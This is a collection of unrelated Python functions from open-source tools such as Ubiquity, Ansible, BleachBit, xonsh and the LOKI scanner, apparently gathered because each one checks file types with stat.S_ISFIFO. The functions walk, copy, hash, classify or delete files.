def plugin_io_open(self, context, IOP): self.FNAME = IOP.fname.decode("string_escape") bareosfd.DebugMessage( context, 250, "io_open: self.FNAME is set to %s\n" % (self.FNAME)) if os.path.isdir(self.FNAME): bareosfd.DebugMessage(context, 100, "%s is a directory\n" % (self.FNAME)) self.fileType = "FT_DIR" bareosfd.DebugMessage( context, 100, "Did not open file %s of type %s\n" % (self.FNAME, self.fileType), ) return bRCs["bRC_OK"] elif os.path.islink(self.FNAME): self.fileType = "FT_LNK" bareosfd.DebugMessage( context, 100, "Did not open file %s of type %s\n" % (self.FNAME, self.fileType), ) return bRCs["bRC_OK"] elif os.path.exists(self.FNAME) and stat.S_ISFIFO( os.stat(self.FNAME).st_mode): self.fileType = "FT_FIFO" bareosfd.DebugMessage( context, 100, "Did not open file %s of type %s\n" % (self.FNAME, self.fileType), ) return bRCs["bRC_OK"] else: self.fileType = "FT_REG" bareosfd.DebugMessage( context, 150, "file %s has type %s - trying to open it\n" % (self.FNAME, self.fileType), ) try: if IOP.flags & (os.O_CREAT | os.O_WRONLY): bareosfd.DebugMessage( context, 100, "Open file %s for writing with %s\n" % (self.FNAME, IOP), ) dirname = os.path.dirname(self.FNAME) if not os.path.exists(dirname): bareosfd.DebugMessage( context, 100, "Directory %s does not exist, creating it now\n" % (dirname), ) os.makedirs(dirname) self.file = open(self.FNAME, "wb") else: bareosfd.DebugMessage( context, 100, "Open file %s for reading with %s\n" % (self.FNAME, IOP), ) self.file = open(self.FNAME, "rb") except: IOP.status = -1 return bRCs["bRC_Error"] return bRCs["bRC_OK"]
def run_digifil(hdr, fil_out_dir=None, start=1, nsecs=120, nchan=128, overwrite=False, pol=2, nbit=8, tscrunch=1, nthreads=1, dm=0.0, coherent=False): filterbankfile = hdr.replace('.hdr', '.fil') if fil_out_dir is not None: filterbankfile = '{0}/{1}'.format(fil_out_dir, os.path.basename(filterbankfile)) if os.path.exists(filterbankfile): if overwrite: if not stat.S_ISFIFO(os.stat(filterbankfile).st_mode): os.remove(filterbankfile) else: raise InputError( 'Filterbankfile {0} exists already. '.format(filterbankfile) + 'Delete first or set --force to overwrite') valid_nbit = [2, 8, 16, -32] if not nbit in valid_nbit: raise InputError( f'nbit={nbit} not in supported values of {valid_nbit}. ') if tscrunch > 1: cmd = 'digifil -cont -c -b{4} -S{0} -T{1} -2 -D 0.0 -t {6} -o {2} {3} -threads {5}'.format( start, nsecs, filterbankfile, hdr, nbit, nthreads, tscrunch) else: cmd = 'digifil -cont -c -b{4} -S{0} -T{1} -2 -D 0.0 -o {2} {3} -threads {5}'.format( start, nsecs, filterbankfile, hdr, nbit, nthreads) leakage_factor = 512 if nchan <= 128 else 2 * nchan if pol < 2: cmd = '{0} -P{1} -F{2}:{3}'.format(cmd, pol, nchan, leakage_factor) else: if pol == 2: # get Stokes I, i.e. PP+QQ cmd = '{0} -d1 -F{1}:{2}'.format(cmd, nchan, leakage_factor) elif pol == 4: # full pol, PP,QQ,PQ,QP cmd = '{0} -d4 -F{1}:{2}'.format(cmd, nchan, leakage_factor) elif pol == 3: # (PP+QQ)^2 cmd = '{0} -d3 -F{1}:{2}'.format(cmd, nchan, leakage_factor) else: raise InputError( f'pol = {pol} not implemented. Choices are 0, 1, 2, 3, 4') if dm > 0.0: cmd = '{0} -D {1}'.format(cmd, dm) if coherent: cmd = '{0} -F{1}:D'.format(cmd, nchan) print('running {0}'.format(cmd)) try: id = id_generator() errfile_nme = '/tmp/digifil.{0}'.format(id) errfile = open(errfile_nme, 'w') id = id_generator() outfile_nme = '/tmp/digifil.{0}'.format(id) outfile = open(outfile_nme, 'w') subprocess.check_call(cmd, shell=True, stdout=outfile, stderr=errfile) except subprocess.CalledProcessError: with open(outfile, 'r') as f: stdout = f.readlines() with open(errfile, 'r') as f: stderr = f.readlines() raise RunError( f'Digifil died. \n stdout reports \n {stdout} \n stderr reports \n {stderr}' ) return filterbankfile
def is_piped(file_obj): "check if file-object is a pipe or a file redirect" mode = os.fstat(file_obj.fileno()).st_mode return stat.S_ISFIFO(mode) or stat.S_ISREG(mode)
return { 'name': args.name, 'tag': args.tag, 'language': args.language, content_or_file: content } if __name__ == '__main__': print("Running...") mode = os.fstat(0).st_mode # This is to check if data is being piped in, # we'll add this later if stat.S_ISFIFO(mode): #text = sys.stdin.read() txt = [] for line in fileinput.input(): txt.append(line.strip('')) print(" ".join(txt)) print(fileinput.filename()) text = " ".join(txt) #upload(text) else: # Data is NOT being piped in, normal cli tools # Cool **parse_flag works with unpacking u = Upload(**parse_flag()) u.create_json()
def copy_all(self): """Core copy process. This is the most important step of this stage. It clones live filesystem into a local partition in the selected hard disk.""" self.db.progress('START', 0, 100, 'ubiquity/install/title') self.db.progress('INFO', 'ubiquity/install/copying') fs_size = os.path.join(self.casper_path, 'filesystem.size') if os.path.exists(fs_size): with open(fs_size) as total_size_fp: total_size = int(total_size_fp.readline()) else: # Fallback in case an Xenta OS derivative forgets to put # /casper/filesystem.size on the CD, or to account for things # like CD->USB transformation tools that don't copy this file. # This is slower than just reading the size from a file, but # better than crashing. # # Obviously doing os.walk() twice is inefficient, but I'd rather # not suck the list into ubiquity's memory, and I'm guessing # that the kernel's dentry cache will avoid most of the slowness # anyway. total_size = 0 for dirpath, dirnames, filenames in os.walk(self.source): for name in dirnames + filenames: fqpath = os.path.join(dirpath, name) total_size += os.lstat(fqpath).st_size # Progress bar handling: # We sample progress every half-second (assuming time.time() gives # us sufficiently good granularity) and use the average of progress # over the last minute or so to decide how much time remains. We # don't bother displaying any progress for the first ten seconds in # order to allow things to settle down, and we only update the "time # remaining" indicator at most every two seconds after that. copy_progress = 0 copied_size = 0 directory_times = [] time_start = time.time() times = [(time_start, copied_size)] long_enough = False time_last_update = time_start debug = 'UBIQUITY_DEBUG' in os.environ if self.db.get('ubiquity/install/md5_check') == 'false': md5_check = False else: md5_check = True # Increase kernel flush times during bulk data copying to make it # more likely that small files are packed contiguously, which should # speed up initial boot times. dirty_writeback_centisecs = None dirty_expire_centisecs = None if os.path.exists('/proc/sys/vm/dirty_writeback_centisecs'): with open('/proc/sys/vm/dirty_writeback_centisecs') as dwc: dirty_writeback_centisecs = int(dwc.readline()) with open('/proc/sys/vm/dirty_writeback_centisecs', 'w') as dwc: print('3000\n', file=dwc) if os.path.exists('/proc/sys/vm/dirty_expire_centisecs'): with open('/proc/sys/vm/dirty_expire_centisecs') as dec: dirty_expire_centisecs = int(dec.readline()) with open('/proc/sys/vm/dirty_expire_centisecs', 'w') as dec: print('6000\n', file=dec) old_umask = os.umask(0) for dirpath, dirnames, filenames in os.walk(self.source): sp = dirpath[len(self.source) + 1:] for name in dirnames + filenames: relpath = os.path.join(sp, name) # /etc/fstab was legitimately created by partman, and # shouldn't be copied again. Similarly, /etc/crypttab may # have been legitimately created by the user-setup plugin. if relpath in ("etc/fstab", "etc/crypttab"): continue sourcepath = os.path.join(self.source, relpath) targetpath = os.path.join(self.target, relpath) st = os.lstat(sourcepath) # Is the path blacklisted? if (not stat.S_ISDIR(st.st_mode) and '/%s' % relpath in self.blacklist): if debug: syslog.syslog('Not copying %s' % relpath) continue # Remove the target if necessary and if we can. install_misc.remove_target(self.source, self.target, relpath, st) # Now actually copy source to target. mode = stat.S_IMODE(st.st_mode) if stat.S_ISLNK(st.st_mode): linkto = os.readlink(sourcepath) os.symlink(linkto, targetpath) elif stat.S_ISDIR(st.st_mode): if not os.path.isdir(targetpath): try: os.mkdir(targetpath, mode) except OSError as e: # there is a small window where update-apt-cache # can race with us since it creates # "/target/var/cache/apt/...". Hence, ignore # failure if the directory does now exist where # brief moments before it didn't. if e.errno != errno.EEXIST: raise elif stat.S_ISCHR(st.st_mode): os.mknod(targetpath, stat.S_IFCHR | mode, st.st_rdev) elif stat.S_ISBLK(st.st_mode): os.mknod(targetpath, stat.S_IFBLK | mode, st.st_rdev) elif stat.S_ISFIFO(st.st_mode): os.mknod(targetpath, stat.S_IFIFO | mode) elif stat.S_ISSOCK(st.st_mode): os.mknod(targetpath, stat.S_IFSOCK | mode) elif stat.S_ISREG(st.st_mode): install_misc.copy_file(self.db, sourcepath, targetpath, md5_check) # Copy metadata. copied_size += st.st_size os.lchown(targetpath, st.st_uid, st.st_gid) if not stat.S_ISLNK(st.st_mode): os.chmod(targetpath, mode) if stat.S_ISDIR(st.st_mode): directory_times.append( (targetpath, st.st_atime, st.st_mtime)) # os.utime() sets timestamp of target, not link elif not stat.S_ISLNK(st.st_mode): try: os.utime(targetpath, (st.st_atime, st.st_mtime)) except Exception: # We can live with timestamps being wrong. pass if (hasattr(os, "listxattr") and hasattr(os, "supports_follow_symlinks") and os.supports_follow_symlinks): try: attrnames = os.listxattr(sourcepath, follow_symlinks=False) for attrname in attrnames: attrvalue = os.getxattr(sourcepath, attrname, follow_symlinks=False) os.setxattr(targetpath, attrname, attrvalue, follow_symlinks=False) except OSError as e: if e.errno not in (errno.EPERM, errno.ENOTSUP, errno.ENODATA): raise if int((copied_size * 90) / total_size) != copy_progress: copy_progress = int((copied_size * 90) / total_size) self.db.progress('SET', 10 + copy_progress) time_now = time.time() if (time_now - times[-1][0]) >= 0.5: times.append((time_now, copied_size)) if not long_enough and time_now - times[0][0] >= 10: long_enough = True if long_enough and time_now - time_last_update >= 2: time_last_update = time_now while (time_now - times[0][0] > 60 and time_now - times[1][0] >= 60): times.pop(0) speed = ((times[-1][1] - times[0][1]) / (times[-1][0] - times[0][0])) if speed != 0: time_remaining = (int( (total_size - copied_size) / speed)) if time_remaining < 60: self.db.progress( 'INFO', 'ubiquity/install/copying_minute') # Apply timestamps to all directories now that the items within them # have been copied. for dirtime in directory_times: (directory, atime, mtime) = dirtime try: os.utime(directory, (atime, mtime)) except Exception: # I have no idea why I've been getting lots of bug reports # about this failing, but I really don't care. Ignore it. pass # Revert to previous kernel flush times. if dirty_writeback_centisecs is not None: with open('/proc/sys/vm/dirty_writeback_centisecs', 'w') as dwc: print(dirty_writeback_centisecs, file=dwc) if dirty_expire_centisecs is not None: with open('/proc/sys/vm/dirty_expire_centisecs', 'w') as dec: print(dirty_expire_centisecs, file=dec) # Try some possible locations for the kernel we used to boot. This # lets us save a couple of megabytes of CD space. bootdir = self.target_file('boot') kernel = self.find_cd_kernel() if kernel: prefix = os.path.basename(kernel).split('-', 1)[0] release = os.uname()[2] target_kernel = os.path.join(bootdir, '%s-%s' % (prefix, release)) copies = [] # ISO9660 images may have to use .efi rather than .efi.signed in # order to support being booted using isolinux, which must abide # by archaic 8.3 restrictions. for suffix in (".efi", ".efi.signed"): if os.path.exists(kernel + suffix): signed_kernel = kernel + suffix break else: signed_kernel = None if os.path.exists(kernel): copies.append((kernel, target_kernel)) elif signed_kernel is not None: # No unsigned kernel. We'll construct it using sbsigntool. copies.append((signed_kernel, target_kernel)) if signed_kernel is not None: copies.append((signed_kernel, "%s.efi.signed" % target_kernel)) for source, target in copies: osextras.unlink_force(target) install_misc.copy_file(self.db, source, target, md5_check) os.lchown(target, 0, 0) os.chmod(target, 0o644) st = os.lstat(source) try: os.utime(target, (st.st_atime, st.st_mtime)) except Exception: # We can live with timestamps being wrong. pass if not os.path.exists(kernel) and signed_kernel is not None: # Construct the unsigned kernel. subprocess.check_call(["sbattach", "--remove", target_kernel]) os.umask(old_umask) self.db.progress('SET', 100) self.db.progress('STOP')
def process(path): s = os.lstat(path) if stat.S_ISDIR(s.st_mode): update_hash('d') elif stat.S_ISCHR(s.st_mode): update_hash('c') elif stat.S_ISBLK(s.st_mode): update_hash('b') elif stat.S_ISSOCK(s.st_mode): update_hash('s') elif stat.S_ISLNK(s.st_mode): update_hash('l') elif stat.S_ISFIFO(s.st_mode): update_hash('p') else: update_hash('-') def add_perm(mask, on, off='-'): if mask & s.st_mode: update_hash(on) else: update_hash(off) add_perm(stat.S_IRUSR, 'r') add_perm(stat.S_IWUSR, 'w') if stat.S_ISUID & s.st_mode: add_perm(stat.S_IXUSR, 's', 'S') else: add_perm(stat.S_IXUSR, 'x') add_perm(stat.S_IRGRP, 'r') add_perm(stat.S_IWGRP, 'w') if stat.S_ISGID & s.st_mode: add_perm(stat.S_IXGRP, 's', 'S') else: add_perm(stat.S_IXGRP, 'x') add_perm(stat.S_IROTH, 'r') add_perm(stat.S_IWOTH, 'w') if stat.S_ISVTX & s.st_mode: update_hash('t') else: add_perm(stat.S_IXOTH, 'x') if include_owners: try: update_hash(" %10s" % pwd.getpwuid(s.st_uid).pw_name) update_hash(" %10s" % grp.getgrgid(s.st_gid).gr_name) except KeyError as e: bb.warn("KeyError in %s" % path) msg = ( "KeyError: %s\nPath %s is owned by uid %d, gid %d, which doesn't match " "any user/group on target. This may be due to host contamination." % (e, path, s.st_uid, s.st_gid)) raise Exception(msg).with_traceback(e.__traceback__) if include_timestamps: update_hash(" %10d" % s.st_mtime) update_hash(" ") if stat.S_ISBLK(s.st_mode) or stat.S_ISCHR(s.st_mode): update_hash("%9s" % ("%d.%d" % (os.major(s.st_rdev), os.minor(s.st_rdev)))) else: update_hash(" " * 9) update_hash(" ") if stat.S_ISREG(s.st_mode): update_hash("%10d" % s.st_size) else: update_hash(" " * 10) update_hash(" ") fh = hashlib.sha256() if stat.S_ISREG(s.st_mode): # Hash file contents with open(path, 'rb') as d: for chunk in iter(lambda: d.read(4096), b""): fh.update(chunk) update_hash(fh.hexdigest()) else: update_hash(" " * len(fh.hexdigest())) update_hash(" %s" % path) if stat.S_ISLNK(s.st_mode): update_hash(" -> %s" % os.readlink(path)) update_hash("\n")
def FileFromFilesystem(path, pathId, possibleMatch=None, inodeInfo=False, assumeRoot=False, statBuf=None, sha1FailOk=False): if statBuf: s = statBuf else: s = os.lstat(path) global userCache, groupCache, _havePrelink if assumeRoot: owner = 'root' group = 'root' elif isinstance(s.st_uid, basestring): # Already stringified -- some capsule code will fabricate a stat result # from e.g. a RPM header owner = s.st_uid group = s.st_gid else: # + is not a valid char in user/group names; if the uid is not mapped # to a user, prepend it with + and store it as a string try: owner = userCache.lookupId('/', s.st_uid) except KeyError: owner = '+%d' % s.st_uid try: group = groupCache.lookupId('/', s.st_gid) except KeyError: group = '+%d' % s.st_gid needsSha1 = 0 inode = InodeStream(s.st_mode & 07777, s.st_mtime, owner, group) if (stat.S_ISREG(s.st_mode)): f = RegularFile(pathId) needsSha1 = 1 elif (stat.S_ISLNK(s.st_mode)): f = SymbolicLink(pathId) if hasattr(s, 'linkto'): f.target.set(s.linkto) else: f.target.set(os.readlink(path)) elif (stat.S_ISDIR(s.st_mode)): f = Directory(pathId) elif (stat.S_ISSOCK(s.st_mode)): f = Socket(pathId) elif (stat.S_ISFIFO(s.st_mode)): f = NamedPipe(pathId) elif (stat.S_ISBLK(s.st_mode)): f = BlockDevice(pathId) f.devt.major.set(s.st_rdev >> 8) f.devt.minor.set(s.st_rdev & 0xff) elif (stat.S_ISCHR(s.st_mode)): f = CharacterDevice(pathId) f.devt.major.set(s.st_rdev >> 8) f.devt.minor.set(s.st_rdev & 0xff) else: raise FilesError("unsupported file type for %s" % path) f.inode = inode f.flags = FlagsStream(0) # assume we have a match if the FileMode and object type match if possibleMatch and (possibleMatch.__class__ == f.__class__) \ and f.inode == possibleMatch.inode \ and f.inode.mtime() == possibleMatch.inode.mtime() \ and (not s.st_size or (possibleMatch.hasContents and s.st_size == possibleMatch.contents.size())): f.flags.set(possibleMatch.flags()) return possibleMatch elif ( possibleMatch and (isinstance(f, RegularFile) and isinstance(possibleMatch, RegularFile)) and (f.inode.isExecutable()) and f.inode.mtime() == possibleMatch.inode.mtime() and f.inode.owner == possibleMatch.inode.owner and f.inode.group == possibleMatch.inode.group and f.inode.perms == possibleMatch.inode.perms): # executable RegularFiles match even if there sizes are different # as long as everything else is the same; this is to stop size # changes from prelink from changing fileids return possibleMatch if needsSha1: f.contents = RegularFileStream() undoPrelink = False if _havePrelink != False and f.inode.isExecutable(): try: from conary.lib import elf if elf.prelinked(path): undoPrelink = True except: pass if undoPrelink and _havePrelink is None: _havePrelink = bool(os.access(PRELINK_CMD[0], os.X_OK)) if undoPrelink and _havePrelink: prelink = subprocess.Popen(PRELINK_CMD + ('-uo', '-', path), stdout=subprocess.PIPE, close_fds=True, shell=False) d = digestlib.sha1() content = prelink.stdout.read() size = 0 while content: d.update(content) size += len(content) content = prelink.stdout.read() prelink.wait() f.contents.size.set(size) sha1 = d.digest() else: try: sha1 = sha1helper.sha1FileBin(path) except OSError: if sha1FailOk: sha1 = sha1helper.sha1Empty else: raise f.contents.size.set(s.st_size) f.contents.sha1.set(sha1) if inodeInfo: return (f, s.st_nlink, (s.st_rdev, s.st_ino)) return f
def run_once(self): """ Checks a number of sensitive processes on Chrome OS for unexpected open file descriptors. """ self.snapshot_system() passes = [] filters = [ r'0700 anon_inode:\[event.*\]', r'0[35]00 pipe:.*', r'0[57]00 socket:.*', r'0500 /dev/null', r'0[57]00 /dev/urandom', r'0300 /var/log/chrome/chrome_.*', r'0[37]00 /var/log/ui/ui.*', ] # Whitelist fd-type check, suitable for Chrome processes. # Notably, this omits S_ISDIR. allowed_fd_type_check = lambda x: (stat.S_ISREG(x) or stat.S_ISCHR( x) or stat.S_ISSOCK(x) or stat.S_ISFIFO(x) or security_OpenFDs. _S_ISANONFD(x)) # TODO(jorgelo): revisit this and potentially remove. if asan.running_on_asan(): # On ASan, allow all fd types and opening /proc logging.info("Running on ASan, allowing /proc") allowed_fd_type_check = lambda x: True filters.append(r'0500 /proc') passes.append( self.check_process('chrome', 'type=plugin', filters, allowed_fd_type_check)) filters.extend([ r'0[57]00 /dev/shm/..*', r'0500 /opt/google/chrome/.*.pak', r'0500 /opt/google/chrome/icudtl.dat', # These used to be bundled with the Chrome binary. # See crbug.com/475170. r'0500 /opt/google/chrome/natives_blob.bin', r'0500 /opt/google/chrome/snapshot_blob.bin', # Font files can be kept open in renderers # for performance reasons. # See crbug.com/452227. r'0500 /usr/share/fonts/.*', # Zero-copy texture uploads. crbug.com/607632. r'0700 anon_inode:dmabuf', ]) try: # Renderers have access to DRM vgem device for graphics tile upload. # See crbug.com/537474. filters.append(r'0700 /dev/dri/%s' % os.readlink('/dev/dri/vgem')) except OSError: # /dev/dri/vgem doesn't exist. pass passes.append( self.check_process('chrome', 'type=renderer', filters, allowed_fd_type_check)) if False in passes: raise error.TestFail("Unexpected open file descriptors.")
def color_file(file_path: str, mode: int) -> (Color, str): """Determine color to use for file as ls -c would, given stat() results and its name. Parameters ---------- file_path : string relative path of file (as user typed it). mode : int stat() results for file_path. Returns ------- color token, color_key Bugs ---- * doesn't handle CA (capability) """ lsc = builtins.__xonsh__.env["LS_COLORS"] color_key = "rs" if stat.S_ISLNK(mode): # must test link before S_ISREG (esp execute) color_key = "ln" try: os.stat(file_path) except FileNotFoundError: color_key = "or" elif stat.S_ISREG(mode): if stat.S_IMODE(mode) & (stat.S_IXUSR + stat.S_IXGRP + stat.S_IXOTH): color_key = "ex" elif ( mode & stat.S_ISUID ): # too many tests before we get to the common case -- restructure? color_key = "su" elif mode & stat.S_ISGID: color_key = "sg" else: match = color_file_extension_RE.match(file_path) if match: ext = "*" + match.group( 1) # look for *.<fileExtension> coloring if ext in lsc: color_key = ext else: color_key = "rs" else: color_key = "rs" elif stat.S_ISDIR( mode): # ls -c doesn't colorize sticky or ow if not dirs... color_key = ("di", "ow", "st", "tw")[(mode & stat.S_ISVTX == stat.S_ISVTX) * 2 + (mode & stat.S_IWOTH == stat.S_IWOTH)] elif stat.S_ISCHR(mode): color_key = "cd" elif stat.S_ISBLK(mode): color_key = "bd" elif stat.S_ISFIFO(mode): color_key = "pi" elif stat.S_ISSOCK(mode): color_key = "so" elif stat.S_ISDOOR(mode): color_key = "do" # bug missing mapping for FMT based PORT and WHITEOUT ?? ret_color_token = file_color_tokens.get(color_key, None) return ret_color_token, color_key
def run(self): super(PlaybookCLI, self).run() # Note: slightly wrong, this is written so that implicit localhost # Manage passwords sshpass = None becomepass = None passwords = {} if self.options.role_file: args = ["install"] if self.options.ignore_errors: args.append("--ignore-errors") force = "" if self.options.force: args.append("--force") if self.options.roles_path: args.extend(["--roles-path", self.options.roles_path]) if self.options.no_deps: args.append("--no-deps") args.extend(["--role-file", self.options.role_file]) gc = GalaxyCLI(args=args) gc.parse() gc.run() # initial error check, to make sure all specified playbooks are accessible # before we start running anything through the playbook executor for playbook in self.args: if not os.path.exists(playbook): raise AnsibleError("the playbook: %s could not be found" % playbook) if not (os.path.isfile(playbook) or stat.S_ISFIFO(os.stat(playbook).st_mode)): raise AnsibleError( "the playbook: %s does not appear to be a file" % playbook) # don't deal with privilege escalation or passwords when we don't need to if not self.options.listhosts and not self.options.listtasks and not self.options.listtags and not self.options.syntax: self.normalize_become_options() (sshpass, becomepass) = self.ask_passwords() passwords = {'conn_pass': sshpass, 'become_pass': becomepass} loader, inventory, variable_manager = self._play_prereqs(self.options) # (which is not returned in list_hosts()) is taken into account for # warning if inventory is empty. But it can't be taken into account for # checking if limit doesn't match any hosts. Instead we don't worry about # limit if only implicit localhost was in inventory to start with. # # Fix this when we rewrite inventory by making localhost a real host (and thus show up in list_hosts()) no_hosts = False if len(inventory.list_hosts()) == 0: # Empty inventory display.warning( "provided hosts list is empty, only localhost is available") no_hosts = True inventory.subset(self.options.subset) if len(inventory.list_hosts()) == 0 and no_hosts is False: # Invalid limit raise AnsibleError("Specified --limit does not match any hosts") # flush fact cache if requested if self.options.flush_cache: self._flush_cache(inventory, variable_manager) # create the playbook executor, which manages running the plays via a task queue manager pbex = PlaybookExecutor(playbooks=self.args, inventory=inventory, variable_manager=variable_manager, loader=loader, options=self.options, passwords=passwords) results = pbex.run() if isinstance(results, list): for p in results: display.display('\nplaybook: %s' % p['playbook']) for idx, play in enumerate(p['plays']): if play._included_path is not None: loader.set_basedir(play._included_path) else: pb_dir = os.path.realpath( os.path.dirname(p['playbook'])) loader.set_basedir(pb_dir) msg = "\n play #%d (%s): %s" % (idx + 1, ','.join( play.hosts), play.name) mytags = set(play.tags) msg += '\tTAGS: [%s]' % (','.join(mytags)) if self.options.listhosts: playhosts = set(inventory.get_hosts(play.hosts)) msg += "\n pattern: %s\n hosts (%d):" % ( play.hosts, len(playhosts)) for host in playhosts: msg += "\n %s" % host display.display(msg) all_tags = set() if self.options.listtags or self.options.listtasks: taskmsg = '' if self.options.listtasks: taskmsg = ' tasks:\n' def _process_block(b): taskmsg = '' for task in b.block: if isinstance(task, Block): taskmsg += _process_block(task) else: if task.action == 'meta': continue all_tags.update(task.tags) if self.options.listtasks: cur_tags = list( mytags.union(set(task.tags))) cur_tags.sort() if task.name: taskmsg += " %s" % task.get_name( ) else: taskmsg += " %s" % task.action taskmsg += "\tTAGS: [%s]\n" % ', '.join( cur_tags) return taskmsg all_vars = variable_manager.get_vars(play=play) play_context = PlayContext(play=play, options=self.options) for block in play.compile(): block = block.filter_tagged_tasks( play_context, all_vars) if not block.has_tasks(): continue taskmsg += _process_block(block) if self.options.listtags: cur_tags = list(mytags.union(all_tags)) cur_tags.sort() taskmsg += " TASK TAGS: [%s]\n" % ', '.join( cur_tags) display.display(taskmsg) return 0 else: return results
def delete(path, shred=False, ignore_missing=False, allow_shred=True): """Delete path that is either file, directory, link or FIFO. If shred is enabled as a function parameter or the BleachBit global parameter, the path will be shredded unless allow_shred = False. """ from bleachbit.Options import options is_special = False path = extended_path(path) if not os.path.lexists(path): if ignore_missing: return raise OSError(2, 'No such file or directory', path) if 'posix' == os.name: # With certain (relatively rare) files on Windows os.lstat() # may return Access Denied mode = os.lstat(path)[stat.ST_MODE] is_special = stat.S_ISFIFO(mode) or stat.S_ISLNK(mode) if is_special: os.remove(path) elif os.path.isdir(path): delpath = path if allow_shred and (shred or options.get('shred')): delpath = wipe_name(path) try: os.rmdir(delpath) except OSError as e: # [Errno 39] Directory not empty # https://bugs.launchpad.net/bleachbit/+bug/1012930 if errno.ENOTEMPTY == e.errno: logger.info("directory is not empty: %s", path) else: raise except WindowsError as e: # WindowsError: [Error 145] The directory is not empty: # 'C:\\Documents and Settings\\username\\Local Settings\\Temp\\NAILogs' # Error 145 may happen if the files are scheduled for deletion # during reboot. if 145 == e.winerror: logger.info("directory is not empty: %s", path) else: raise elif os.path.isfile(path): # wipe contents if allow_shred and (shred or options.get('shred')): try: wipe_contents(path) except pywinerror as e: # 2 = The system cannot find the file specified. # This can happen with a broken symlink # https://github.com/bleachbit/bleachbit/issues/195 if 2 != e.winerror: raise # If a broken symlink, try os.remove() below. except IOError as e: # permission denied (13) happens shredding MSIE 8 on Windows 7 logger.debug("IOError #%s shredding '%s'", e.errno, path, exc_info=True) # wipe name os.remove(wipe_name(path)) else: # unlink os.remove(path) else: logger.info("special file type cannot be deleted: %s", path)
def scanPath(path, rule_sets, filename_iocs, hashes, false_hashes): # Startup log("INFO", "Scanning %s ... " % path) # Counter c = 0 # Get application path appPath = getApplicationPath() # Linux excludes from mtab if isLinux: allExcludes = LINUX_PATH_SKIPS_START | Set(getExcludedMountpoints()) for root, directories, files in scandir.walk(path, onerror=walkError, followlinks=False): if isLinux: # Skip paths that start with .. newDirectories = [] for dir in directories: skipIt = False completePath = os.path.join(root, dir) for skip in allExcludes: if completePath.startswith(skip): log("INFO", "Skipping %s directory" % skip) skipIt = True if not skipIt: newDirectories.append(dir) directories[:] = newDirectories # Loop through files for filename in files: try: # Get the file and path filePath = os.path.join(root, filename) # Linux directory skip if isLinux: # Skip paths that end with .. for skip in LINUX_PATH_SKIPS_END: if filePath.endswith(skip): if LINUX_PATH_SKIPS_END[skip] == 0: log("INFO", "Skipping %s element" % skip) LINUX_PATH_SKIPS_END[skip] = 1 # File mode mode = os.stat(filePath).st_mode if stat.S_ISCHR(mode) or stat.S_ISBLK( mode) or stat.S_ISFIFO(mode) or stat.S_ISLNK( mode) or stat.S_ISSOCK(mode): continue # Counter c += 1 if not args.noindicator: printProgress(c) # Skip program directory if appPath.lower() in filePath.lower(): log( "DEBUG", "Skipping file in program directory FILE: %s" % filePath) continue fileSize = os.stat(filePath).st_size # print file_size # File Name Checks ------------------------------------------------- for regex in filename_iocs.keys(): match = re.search(r'%s' % regex, filePath) if match: description = filenameIOC_desc[regex] score = filename_iocs[regex] if score > 70: log( "ALERT", "File Name IOC matched PATTERN: %s DESC: %s MATCH: %s" % (regex, description, filePath)) elif score > 40: log( "WARNING", "File Name Suspicious IOC matched PATTERN: %s DESC: %s MATCH: %s" % (regex, description, filePath)) # Access check (also used for magic header detection) firstBytes = "" try: with open(filePath, 'rb') as f: firstBytes = f.read(4) except Exception, e: log("DEBUG", "Cannot open file %s (access denied)" % filePath) # Evaluate Type fileType = "" if firstBytes.startswith('\x4d\x5a'): fileType = "EXE" if firstBytes.startswith('\x4d\x44\x4d\x50'): fileType = "MDMP" # Set fileData to an empty value fileData = "" # Evaluations ------------------------------------------------------- # Evaluate size do_intense_check = True if fileSize > (args.s * 1024): # Print files if args.printAll: log("INFO", "Checking %s" % filePath) do_hash_check = False else: if args.printAll: log("INFO", "Scanning %s" % filePath) # Some file types will force intense check if fileType == "MDMP": do_intense_check = True # Hash Check ------------------------------------------------------- # Do the check md5 = "-" sha1 = "-" sha256 = "-" if do_intense_check: fileData = readFileData(filePath) md5, sha1, sha256 = generateHashes(fileData) log( "DEBUG", "MD5: %s SHA1: %s SHA256: %s FILE: %s" % (md5, sha1, sha256, filePath)) # False Positive Hash if md5 in false_hashes.keys() or sha1 in false_hashes.keys( ) or sha256 in false_hashes.keys(): continue # Malware Hash matchType = None matchDesc = None matchHash = None if md5 in hashes.keys(): matchType = "MD5" matchDesc = hashes[md5] matchHash = md5 elif sha1 in hashes.keys(): matchType = "SHA1" matchDesc = hashes[sha1] matchHash = sha1 elif sha256 in hashes.keys(): matchType = "SHA256" matchDesc = hashes[sha256] matchHash = sha256 if matchType: log( "ALERT", "Malware Hash TYPE: %s HASH: %s FILE: %s DESC: %s" % (matchType, matchHash, filePath, matchDesc)) # Yara Check ------------------------------------------------------- # Size and type check if do_intense_check: # Read file data if hash check has been skipped if not fileData: fileData = readFileData(filePath) # Memory Dump Scan if fileType == "MDMP": log("INFO", "Scanning memory dump file %s" % filePath) # Scan with yara try: for rules in rule_sets: # Yara Rule Match matches = rules.match(data=fileData, externals={ 'filename': filename.lower(), 'filepath': filePath.lower() }) # If matched if matches: for match in matches: score = 70 description = "not set" # Built-in rules have meta fields (cannot be expected from custom rules) if hasattr(match, 'meta'): if 'description' in match.meta: description = match.meta[ 'description'] # If a score is given if 'score' in match.meta: score = int(match.meta['score']) # Hash string hash_string = "MD5: %s SHA1: %s SHA256: %s" % ( md5, sha1, sha256) # Matching strings matched_strings = "" if hasattr(match, 'strings'): # Get matching strings matched_strings = getStringMatches( match.strings) if score >= 70: log( "ALERT", "Yara Rule MATCH: %s FILE: %s %s MATCHES: %s" % (match.rule, filePath, hash_string, matched_strings)) elif score >= 40: log( "WARNING", "Yara Rule MATCH: %s FILE: %s %s MATCHES: %s" % (match.rule, filePath, hash_string, matched_strings)) except Exception, e: if args.debug: traceback.print_exc() except Exception, e: if args.debug: traceback.print_exc()
